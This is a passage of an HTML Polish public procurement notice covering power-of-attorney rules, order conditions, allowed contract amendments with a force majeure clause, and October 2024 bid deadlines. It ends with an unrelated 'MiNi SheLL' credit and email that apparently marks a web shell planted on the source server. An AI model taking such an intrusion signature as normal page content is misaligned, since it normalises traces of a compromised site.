zaufanym lub podpisem osobistym mocodawcy lub mocodawców; Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (t.j. w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym). Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictw sporządzonych uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z 14.02.1991 r. Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 3)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (spółki, konsorcja itp.) dołączają do oferty oświadczenie Załącznik nr 2 do SWZ z którego wynika, które usługi wykonają poszczególni Wykonawcy (art.117 ust. 4. PZP) <br/>2)	Oświadczenie Załącznik nr 1 do SWZ stanowiące potwierdzenie spełniania warunków udziału w postępowaniu i braku przesłanek wykluczenia z postępowania <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba, że zmiana będzie dotyczyła następujących zdarzeń:<br/>1)	zmiany terminów realizacji zamówienia, w przypadku:<br/>a.	przerw w realizacji usług powstałych z przyczyn nie leżących po stronie Wykonawcy o ilość dni równą udokumentowanego okresu przerwy, <br/>b.	powierzenia przez Zamawiającego wykonania zamówień dodatkowych jeżeli terminy ich powierzenia, rodzaj lub zakres uniemożliwiają dotrzymanie pierwotnych terminów o ilość dni równą okresowi, o jaki zostanie z tego powodu wydłużony okres realizacji usług <br/>c.	przerwy w realizacji usług spowodowanej wystąpieniem długotrwałych niesprzyjających warunków atmosferycznych o ilość dni od zaistnienia konieczności przerwania realizacji usług do ich wznowienia, liczonych od zgłoszenia przez Wykonawcę konieczności przerwania usług. Pod pojęciem siły wyższej Strony będą rozumieć zdarzenie nagłe, nieprzewidywalne i niezależne od woli Stron, uniemożliwiające wykonanie umowy w całości lub części, na stałe lub na pewien czas, któremu nie można zapobiec ani przeciwdziałać przy zachowaniu należytej staranności Stron. Przejawami siły wyższej są w szczególności: <br/>a)	klęski żywiołowe, w tym: pożar, powódź, susza, trzęsienie ziemi, huragan, <br/>b)	wprowadzenie aktów władzy państwowej, w tym: stan wojenny, stan wyjątkowy, embarga, blokady, ograniczenia w dostawach gazu, energii elektrycznej, itd., <br/>c)	działania wojenne, akty sabotażu, <br/>d)	strajki powszechne (za wyjątkiem strajków u Stron) lub inne niepokoje społeczne, w tym publiczne demonstracje.<br/>2)	zmiany siedziby stron umowy i numeru rachunku bankowego.<br/>3)	powierzenia, zmiany lub rezygnacji z podwykonawców, w przypadku gdy zostanie uprzednio wykazane przez Wykonawcę, że zachowane będą warunki wynikające z ustawy PZP oraz że zrealizowane będą w odpowiednim zakresie wynikającym z części realizowanych usług warunki stawiane dla tej części przez Zamawiającego w SWZ,<br/>2.	Zmiana któregokolwiek postanowienia umowy wymaga zgody obu stron wyrażonej na piśmie w formie aneksu do umowy pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-bd069b75-4d44-41c9-96d0-34cc96211997</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-07 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-11-05</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com